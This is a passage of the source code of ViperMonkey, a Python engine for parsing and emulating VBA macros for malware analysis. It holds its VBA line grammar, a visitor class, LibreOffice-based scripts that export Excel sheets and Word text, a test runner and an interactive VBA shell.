updated_str = VbStr(prefix + new_str + suffix) 443 | 444 | # Done. Return as a VbStr. 445 | return updated_str 446 | 447 | -------------------------------------------------------------------------------- /vipermonkey/core/vba_lines.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Lines 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | 41 | # ------------------------------------------------------------------------------ 42 | # CHANGELOG: 43 | # 2015-02-12 v0.01 PL: - first prototype 44 | # 2015-2016 PL: - many updates 45 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 46 | 47 | __version__ = '0.02' 48 | 49 | # ------------------------------------------------------------------------------ 50 | # TODO: 51 | 52 | # --- IMPORTS ------------------------------------------------------------------ 53 | 54 | from logger import log 55 | 56 | from pyparsing import * 57 | 58 | # --- WSC = White Space Character -------------------------------------------- 59 | 60 | # Important: need to change the default pyparsing whitespace setting, because CRLF is not a whitespace for VBA. 61 | # see MS-VBAL 3.2.2 page 25: 62 | # WSC = (tab-character / eom-character /space-character / DBCS-whitespace / most-Unicode-class-Zs) 63 | # tab-character = %x0009 64 | # eom-character = %x0019 65 | # space-character = %x0020 66 | # DBCS-whitespace = %x3000 67 | # most-Unicode-class-Zs = 68 | # => see http://www.fileformat.info/info/unicode/category/Zs/list.htm 69 | 70 | # TODO: add unicode WS characters, if unicode is properly supported 71 | 72 | ParserElement.setDefaultWhitespaceChars(' \t\x19') 73 | 74 | # IMPORTANT NOTE: it seems preferable NOT to use pyparsing's LineEnd()/lineEnd, 75 | # but line_terminator instead (defined below) 76 | 77 | # --- VBA Physical/Logical Lines --------------------------------------------- 78 | 79 | # 3.2.1 Physical Line Grammar 80 | # module-body-physical-structure = *source-line [non-terminated-line] 81 | # source-line = *non-line-termination-character line-terminator 82 | # non-terminated-line = *non-line-termination-character 83 | # line-terminator = (%x000D %x000A) / %x000D / %x000A / %x2028 / %x2029 84 | # non-line-termination-character = 85 | non_line_termination_character = CharsNotIn('\x0D\x0A', exact=1) # exactly one non_line_termination_character 86 | line_terminator = Literal('\x0D\x0A') | Literal('\x0D') | Literal('\x0A') 87 | non_terminated_line = Optional(CharsNotIn('\x0D\x0A')) # any number of non_line_termination_character 88 | source_line = Optional(CharsNotIn('\x0D\x0A')) + line_terminator 89 | module_body_physical_structure = ZeroOrMore(source_line) + Optional(non_terminated_line) 90 | 91 | # 3.2.2 Logical Line Grammar 92 | # module-body-logical-structure = *extended-line 93 | # extended-line = *(line-continuation / non-line-termination-character) line-terminator 94 | # line-continuation = *WSC underscore *WSC line-terminator 95 | # module-body-lines = *logical-line 96 | # logical-line = LINE-START *extended-line LINE-END 97 | 98 | # NOTE: according to tests with MS Office 2007, and contrary to MS-VBAL, the line continuation pattern requires at 99 | # least one whitespace before the underscore, but not after. 100 | # line_continuation = (White(min=1) + '_' + White(min=0) + line_terminator).leaveWhitespace() 101 | whitespaces = Word(' \t\x19').leaveWhitespace() 102 | line_continuation = (whitespaces + '_' + Optional(whitespaces) + line_terminator).leaveWhitespace() 103 | # replace line_continuation by a single space: 104 | line_continuation.setParseAction(replaceWith(' ')) 105 | extended_line = Combine(ZeroOrMore(line_continuation | non_line_termination_character) + line_terminator) 106 | module_body_logical_structure = ZeroOrMore(extended_line) 107 | logical_line = LineStart() + ZeroOrMore(extended_line.leaveWhitespace()) + line_terminator # rather than LineEnd() 108 | module_body_lines = Combine(ZeroOrMore(logical_line)) # .setDebug() 109 | 110 | # === FUNCTIONS ============================================================== 111 | 112 | def vba_collapse_long_lines(vba_code): 113 | """ 114 | Parse a VBA module code to detect continuation line characters (underscore) and 115 | collapse split lines. Continuation line characters are replaced by spaces. 116 | 117 | :param vba_code: str, VBA module code 118 | :return: str, VBA module code with long lines collapsed 119 | """ 120 | # make sure the last line ends with a newline char, otherwise the parser breaks: 121 | if (vba_code is None): 122 | return "" 123 | if vba_code[-1] != '\n': 124 | vba_code += '\n' 125 | # return module_body_lines.parseString(vba_code, parseAll=True)[0] 126 | # quicker solution without pyparsing: 127 | # TODO: use a regex instead, to allow whitespaces after the underscore? 128 | vba_code = vba_code.replace(' _\r\n', ' ') 129 | vba_code = vba_code.replace(' _\r', ' ') 130 | vba_code = vba_code.replace(' _\n', ' ') 131 | return vba_code 132 | -------------------------------------------------------------------------------- /vipermonkey/core/visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Class template for visitor classes for the visitor design pattern. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | class visitor(object): 40 | """ 41 | The class template for visitor objects for the visitor design pattern. 42 | Visitors can be accepted by the accept method of VBA_Object objects. 43 | """ 44 | 45 | def visit(self): 46 | raise NotImplementedError("Not implemented.") 47 | -------------------------------------------------------------------------------- /vipermonkey/export_all_excel_sheets.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """@package export_all_excel_sheets 4 | Export all of the sheets of an Excel file as separate CSV files. This 5 | is Python 3. 6 | """ 7 | 8 | import sys 9 | import os 10 | import signal 11 | # sudo pip3 install psutil 12 | import psutil 13 | import subprocess 14 | import time 15 | import codecs 16 | import string 17 | 18 | # sudo pip3 install unotools 19 | # sudo apt install libreoffice-calc, python3-uno 20 | from unotools import Socket, connect 21 | from unotools.component.calc import Calc 22 | from unotools.unohelper import convert_path_to_url 23 | from unotools import ConnectionError 24 | 25 | # Please please let printing work. 26 | sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach()) 27 | 28 | # Connection information for LibreOffice. 29 | HOST = "127.0.0.1" 30 | PORT = 2002 31 | 32 | def strip_unprintable(the_str): 33 | """Strip out unprinatble chars from a string. 34 | 35 | @param the_str (str) The string to strip. 36 | 37 | @return (str) The given string with unprintable chars stripped 38 | out. 39 | 40 | """ 41 | 42 | # Grr. Python2 unprintable stripping. 43 | r = the_str 44 | if ((isinstance(r, str)) or (not isinstance(r, bytes))): 45 | r = ''.join(filter(lambda x:x in string.printable, r)) 46 | 47 | # Grr. Python3 unprintable stripping. 48 | else: 49 | tmp_r = "" 50 | for char_code in filter(lambda x:chr(x) in string.printable, r): 51 | tmp_r += chr(char_code) 52 | r = tmp_r 53 | 54 | # Done. 55 | return r 56 | 57 | def to_str(s): 58 | """ 59 | Convert a bytes like object to a str. 60 | 61 | param s (bytes) The string to convert to str. If this is already str 62 | the original string will be returned. 63 | 64 | @return (str) s as a str. 65 | """ 66 | 67 | # Needs conversion? 68 | if (isinstance(s, bytes)): 69 | try: 70 | return s.decode() 71 | except UnicodeDecodeError: 72 | return strip_unprintable(s) 73 | return s 74 | 75 | def is_excel_file(maldoc): 76 | """Check to see if the given file is an Excel file. 77 | 78 | @param maldoc (str) The name of the file to check. 79 | 80 | @return (bool) True if the file is an Excel file, False if not. 81 | 82 | """ 83 | typ = subprocess.check_output(["file", maldoc]) 84 | if ((b"Excel" in typ) or (b"Microsoft OOXML" in typ)): 85 | return True 86 | typ = subprocess.check_output(["exiftool", maldoc]) 87 | return (b"vnd.ms-excel" in typ) 88 | 89 | ################################################################################################### 90 | def wait_for_uno_api(): 91 | """Sleeps until the libreoffice UNO api is available by the headless 92 | libreoffice process. Takes a bit to spin up even after the OS 93 | reports the process as running. Tries 3 times before giving up and 94 | throwing an Exception. 95 | 96 | """ 97 | 98 | tries = 0 99 | 100 | while tries < 3: 101 | try: 102 | connect(Socket(HOST, PORT)) 103 | return 104 | except ConnectionError: 105 | time.sleep(5) 106 | tries += 1 107 | 108 | raise Exception("libreoffice UNO API failed to start") 109 | 110 | ################################################################################################### 111 | def get_office_proc(): 112 | """Returns the process info for the headless LibreOffice 113 | process. None if it's not running 114 | 115 | @return (psutil.Process) The LibreOffice process if found, None if not found. 116 | 117 | """ 118 | 119 | for proc in psutil.process_iter(): 120 | try: 121 | pinfo = proc.as_dict(attrs=['pid', 'name', 'username']) 122 | except psutil.NoSuchProcess: 123 | pass 124 | else: 125 | if (pinfo["name"].startswith("soffice")): 126 | return pinfo 127 | return None 128 | 129 | ################################################################################################### 130 | def is_office_running(): 131 | """Check to see if the headless LibreOffice process is running. 132 | 133 | @return (bool) True if running False otherwise 134 | 135 | """ 136 | 137 | return True if get_office_proc() else False 138 | 139 | ################################################################################################### 140 | def run_soffice(): 141 | """Start the headless, UNO supporting, LibreOffice process to access 142 | the API, if it is not already running. 143 | 144 | """ 145 | 146 | # start the process 147 | if not is_office_running(): 148 | 149 | # soffice is not running. Run it in listening mode. 150 | cmd = "/usr/lib/libreoffice/program/soffice.bin --headless --invisible " + \ 151 | "--nocrashreport --nodefault --nofirststartwizard --nologo " + \ 152 | "--norestore " + \ 153 | '--accept="socket,host=127.0.0.1,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext"' 154 | subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) 155 | wait_for_uno_api() 156 | 157 | def get_component(fname, context): 158 | """Load the object for the Excel spreadsheet. 159 | 160 | @param fname (str) The name of the Excel file. 161 | 162 | @param context (??) The UNO object connected to the local LibreOffice server. 163 | 164 | @return (??) UNO LibreOffice Calc object representing the loaded 165 | Excel file. 166 | 167 | """ 168 | url = convert_path_to_url(fname) 169 | component = Calc(context, url) 170 | return component 171 | 172 | def fix_file_name(fname): 173 | """ 174 | Replace non-printable ASCII characters in the given file name. 175 | """ 176 | r = "" 177 | for c in fname: 178 | if ((ord(c) < 48) or (ord(c) > 122)): 179 | r += hex(ord(c)) 180 | continue 181 | r += c 182 | 183 | return r 184 | 185 | def convert_csv(fname): 186 | """Convert all of the sheets in a given Excel spreadsheet to CSV 187 | files. Also get the name of the currently active sheet. 188 | 189 | @param fname (str) The name of the Excel file. 190 | 191 | @return (list) A list where the 1st element is the name of the 192 | currently active sheet ("NO_ACTIVE_SHEET" if no sheets are active) 193 | and the rest of the elements are the names (str) of the CSV sheet 194 | files. 195 | 196 | """ 197 | 198 | # Make sure this is an Excel file. 199 | if (not is_excel_file(fname)): 200 | 201 | # Not Excel, so no sheets. 202 | return [] 203 | 204 | # Run soffice in listening mode if it is not already running. 205 | run_soffice() 206 | 207 | # TODO: Make sure soffice is running in listening mode. 208 | # 209 | 210 | # Connect to the local LibreOffice server. 211 | context = connect(Socket(HOST, PORT)) 212 | 213 | # Load the Excel sheet. 214 | component = get_component(fname, context) 215 | 216 | # Save the currently active sheet. 217 | r = [] 218 | controller = component.getCurrentController() 219 | active_sheet = controller.ActiveSheet 220 | active_sheet_name = "NO_ACTIVE_SHEET" 221 | if (active_sheet is not None): 222 | active_sheet_name = fix_file_name(active_sheet.getName()) 223 | r.append(active_sheet_name) 224 | 225 | # Iterate on all the sheets in the spreadsheet. 226 | sheets = component.getSheets() 227 | enumeration = sheets.createEnumeration() 228 | pos = 0 229 | if sheets.getCount() > 0: 230 | while enumeration.hasMoreElements(): 231 | 232 | # Move to next sheet. 233 | sheet = enumeration.nextElement() 234 | name = sheet.getName() 235 | if (name.count(" ") > 10): 236 | name = name.replace(" ", "") 237 | name = fix_file_name(name) 238 | controller.setActiveSheet(sheet) 239 | 240 | # Set up the output URL. 241 | short_name = fname 242 | if (os.path.sep in short_name): 243 | short_name = short_name[short_name.rindex(os.path.sep) + 1:] 244 | short_name = fix_file_name(short_name) 245 | outfilename = "/tmp/sheet_%s-%s--%s.csv" % (short_name, str(pos), name.replace(' ', '_SPACE_')) 246 | pos += 1 247 | r.append(outfilename) 248 | url = convert_path_to_url(outfilename) 249 | 250 | # Export the CSV. 251 | component.store_to_url(url,'FilterName','Text - txt - csv (StarCalc)') 252 | 253 | # Close the spreadsheet. 254 | component.close(True) 255 | 256 | # clean up 257 | os.kill(get_office_proc()["pid"], signal.SIGTERM) 258 | 259 | # Done. 260 | return r 261 | 262 | ########################################################################### 263 | ## Main Program 264 | ########################################################################### 265 | if __name__ == '__main__': 266 | r = to_str(str(convert_csv(sys.argv[1]))) 267 | print(r) 268 | -------------------------------------------------------------------------------- /vipermonkey/export_doc_text.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """@package export_doc_text 4 | Export the document text/tables of a Word document via unotools. 5 | This is Python 3. 6 | """ 7 | 8 | # sudo apt install python3-uno 9 | # sudo pip3 install psutil 10 | import psutil 11 | import subprocess 12 | import time 13 | import argparse 14 | import json 15 | import os 16 | import signal 17 | 18 | # sudo pip3 install unotools 19 | # sudo apt install libreoffice-calc, python3-uno 20 | from unotools import Socket, connect 21 | from unotools.component.writer import Writer 22 | from unotools.unohelper import convert_path_to_url 23 | from unotools import ConnectionError 24 | 25 | # Connection information for LibreOffice. 26 | HOST = "127.0.0.1" 27 | PORT = 2002 28 | 29 | ################################################################################################### 30 | def is_word_file(fname): 31 | """Check to see if the given file is a Word file. 32 | 33 | @param fname (str) The path of the file to check. 34 | 35 | @return (bool) True if the file is a Word file, False if not. 36 | 37 | """ 38 | typ = subprocess.check_output(["file", fname]) 39 | return ((b"Microsoft Office Word" in typ) or 40 | (b"Word 2007+" in typ) or 41 | (b"Microsoft OOXML" in typ)) 42 | 43 | ################################################################################################### 44 | def wait_for_uno_api(): 45 | """Sleeps until the libreoffice UNO api is available by the headless 46 | libreoffice process. Takes a bit to spin up even after the OS 47 | reports the process as running. Tries 3 times before giving up and 48 | throwing an Exception. 49 | 50 | """ 51 | 52 | tries = 0 53 | 54 | while tries < 3: 55 | try: 56 | connect(Socket(HOST, PORT)) 57 | return 58 | except ConnectionError: 59 | time.sleep(5) 60 | tries += 1 61 | 62 | raise Exception("libreoffice UNO API failed to start") 63 | 64 | ################################################################################################### 65 | def get_office_proc(): 66 | """ 67 | Returns the process info for the headless libreoffice process. None if it's not running 68 | 69 | @return (psutil.Process) 70 | """ 71 | 72 | for proc in psutil.process_iter(): 73 | try: 74 | pinfo = proc.as_dict(attrs=['pid', 'name', 'username']) 75 | except psutil.NoSuchProcess: 76 | pass 77 | else: 78 | if (pinfo["name"].startswith("soffice")): 79 | return pinfo 80 | return None 81 | 82 | ################################################################################################### 83 | def is_office_running(): 84 | """Check to see if the headless LibreOffice process is running. 85 | 86 | @return (bool) True if running False otherwise 87 | 88 | """ 89 | 90 | return True if get_office_proc() else False 91 | 92 | ################################################################################################### 93 | def run_soffice(): 94 | """Start the headless, UNO supporting, LibreOffice process to access 95 | the API, if it is not already running. 96 | 97 | """ 98 | 99 | # start the process 100 | if not is_office_running(): 101 | 102 | # soffice is not running. Run it in listening mode. 103 | cmd = "/usr/lib/libreoffice/program/soffice.bin --headless --invisible " + \ 104 | "--nocrashreport --nodefault --nofirststartwizard --nologo " + \ 105 | "--norestore " + \ 106 | '--accept="socket,host=127.0.0.1,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext"' 107 | subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) 108 | wait_for_uno_api() 109 | 110 | ################################################################################################### 111 | def get_document(fname, connection): 112 | """Load the component containing the word document. 113 | 114 | @param connection (ScriptContext) Connection to the headless LibreOffice process 115 | 116 | @param fname (str) Path to the Word doc 117 | 118 | @return document (Writer) UNO object representing the loaded Word 119 | document. 120 | 121 | """ 122 | 123 | url = convert_path_to_url(fname) 124 | document = Writer(connection, url) 125 | return document 126 | 127 | ################################################################################################### 128 | def get_text(document): 129 | """Get the document text of a given Word file. 130 | 131 | @param document (Writer) LibreOffice component containing the 132 | document. 133 | 134 | @return (str) The text from the document. 135 | 136 | """ 137 | 138 | # Get the text. Add a character at the start to simulate an embedded image at start. 139 | return "\x0c" + str(document.getText().getString()) 140 | 141 | ################################################################################################### 142 | def get_tables(document): 143 | """Get the text tables embedded in the Word doc. 144 | 145 | @param document (Writer) LibreOffice component containing the 146 | document. 147 | 148 | @return (list) List of 2D arrays containing text content of all 149 | cells in all text tables of the document 150 | 151 | """ 152 | 153 | data_array_list = [] 154 | 155 | text_tables = document.getTextTables() 156 | table_count = 0 157 | while table_count < text_tables.getCount(): 158 | data_array_list.append(text_tables.getByIndex(table_count).getDataArray()) 159 | table_count += 1 160 | 161 | return data_array_list 162 | 163 | 164 | ########################################################################### 165 | ## Main Program 166 | ########################################################################### 167 | if __name__ == '__main__': 168 | arg_parser = argparse.ArgumentParser(description="export text from various properties in a Word " 169 | "document via the LibreOffice API") 170 | arg_parser.add_argument("--tables", action="store_true", 171 | help="export a list of 2D lists containing the cell contents" 172 | "of each text table in the document") 173 | arg_parser.add_argument("--text", action="store_true", 174 | help="export a string containing the document text") 175 | arg_parser.add_argument("-f", "--file", action="store", required=True, 176 | help="path to the word doc") 177 | args = arg_parser.parse_args() 178 | 179 | # Make sure this is a word file. 180 | if (not is_word_file(args.file)): 181 | 182 | # Not Word, so no text. 183 | exit() 184 | 185 | # Run soffice in listening mode if it is not already running. 186 | run_soffice() 187 | 188 | # Connect to the local LibreOffice server. 189 | connection = connect(Socket(HOST, PORT)) 190 | 191 | # Load the document using the connection 192 | document = get_document(args.file, connection) 193 | 194 | if args.text: 195 | print(get_text(document)) 196 | elif args.tables: 197 | print(json.dumps(get_tables(document))) 198 | 199 | # clean up 200 | document.close(True) 201 | os.kill(get_office_proc()["pid"], signal.SIGTERM) 202 | -------------------------------------------------------------------------------- /vipermonkey/v_test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | if __name__ == '__main__': 4 | import sys 5 | from vmonkey import * 6 | 7 | f=open(sys.argv[1],'r') 8 | x=f.read() 9 | f.close() 10 | 11 | r=process_file('','',x, strip_useless=True) 12 | 13 | print r[0][1] 14 | -------------------------------------------------------------------------------- /vipermonkey/vbashell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA command line shell 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | from __future__ import print_function 41 | 42 | # ------------------------------------------------------------------------------ 43 | # CHANGELOG: 44 | # 2015-02-12 v0.01 PL: - first prototype 45 | # 2015-2016 PL: - many updates 46 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 47 | # 2016-12-11 v0.04 PL: - fixed relative import for vmonkey package (issue #17) 48 | 49 | __version__ = '0.04' 50 | 51 | # ------------------------------------------------------------------------------ 52 | # TODO: 53 | # + use readline 54 | 55 | # --- IMPORTS ------------------------------------------------------------------ 56 | 57 | import logging, optparse, sys, os 58 | 59 | import colorlog 60 | 61 | # add the vipermonkey folder to sys.path (absolute+normalized path): 62 | _thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) 63 | if not _thismodule_dir in sys.path: 64 | sys.path.insert(0, _thismodule_dir) 65 | 66 | # relative import of the vmonkey module: 67 | import vmonkey 68 | 69 | vm = vmonkey.ViperMonkey() 70 | 71 | 72 | def parse(filename=None): 73 | if filename is None: 74 | print('Enter VBA code, end by a line containing only ".":') 75 | code = '' 76 | line = None 77 | while True: 78 | line = raw_input() 79 | if line == '.': 80 | break 81 | code += line + '\n' 82 | else: 83 | print('Parsing file %r' % filename) 84 | code = open(filename).read() 85 | vm.add_module(code) 86 | 87 | def eval_expression(e): 88 | print('Evaluating %s' % e) 89 | value = vm.eval(e) 90 | print('Returned value: %s' % value) 91 | # print table of all recorded actions 92 | print('Recorded Actions:') 93 | print(vm.dump_actions()) 94 | 95 | 96 | def main(): 97 | """ 98 | Main function, called when vbashell is run from the command line 99 | """ 100 | # print banner with version 101 | print ('vbashell %s - https://github.com/decalage2/ViperMonkey' % __version__) 102 | print ('THIS IS WORK IN PROGRESS - Check updates regularly!') 103 | print ('Please report any issue at https://github.com/decalage2/ViperMonkey/issues') 104 | print ('') 105 | 106 | DEFAULT_LOG_LEVEL = "info" # Default log level 107 | LOG_LEVELS = { 108 | 'debug': logging.DEBUG, 109 | 'info': logging.INFO, 110 | 'warning': logging.WARNING, 111 | 'error': logging.ERROR, 112 | 'critical': logging.CRITICAL 113 | } 114 | 115 | usage = 'usage: %prog [options] [filename2 ...]' 116 | parser = optparse.OptionParser(usage=usage) 117 | parser.add_option('-p', '--parse', dest='parse_file', 118 | help='VBA text file to be parsed') 119 | parser.add_option('-e', '--eval', dest='eval_expr', 120 | help='VBA expression to be evaluated') 121 | parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL, 122 | help="logging level debug/info/warning/error/critical (default=%default)") 123 | 124 | (options, args) = parser.parse_args() 125 | 126 | # Print help if no arguments are passed 127 | # if len(args) == 0: 128 | # print(__doc__) 129 | # parser.print_help() 130 | # sys.exit() 131 | 132 | # setup logging to the console 133 | # logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s') 134 | 135 | colorlog.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(log_color)s%(levelname)-8s %(message)s') 136 | 137 | if options.parse_file: 138 | parse(options.parse_file) 139 | 140 | if options.eval_expr: 141 | eval_expression(options.eval_expr) 142 | 143 | while True: 144 | try: 145 | print("VBA> ", end='') 146 | cmd = raw_input() 147 | 148 | if cmd.startswith('exit'): 149 | break 150 | 151 | if cmd.startswith('parse'): 152 | parse() 153 | 154 | if cmd.startswith('trace'): 155 | args = cmd.split() 156 | print('Tracing %s' % args[1]) 157 | vm.trace(entrypoint=args[1]) 158 | # print table of all recorded actions 159 | print('Recorded Actions:') 160 | print(vm.dump_actions()) 161 | 162 | if cmd.startswith('eval'): 163 | expr = cmd[5:] 164 | eval_expression(expr) 165 | except Exception: 166 | vmonkey.log.exception('ERROR') 167 | 168 | if __name__ == '__main__': 169 | main() 170 | 171 | # Soundtrack: This code was developed while listening to "Five Little Monkeys Jumping On The Bed" --------------------------------------------------------------------------------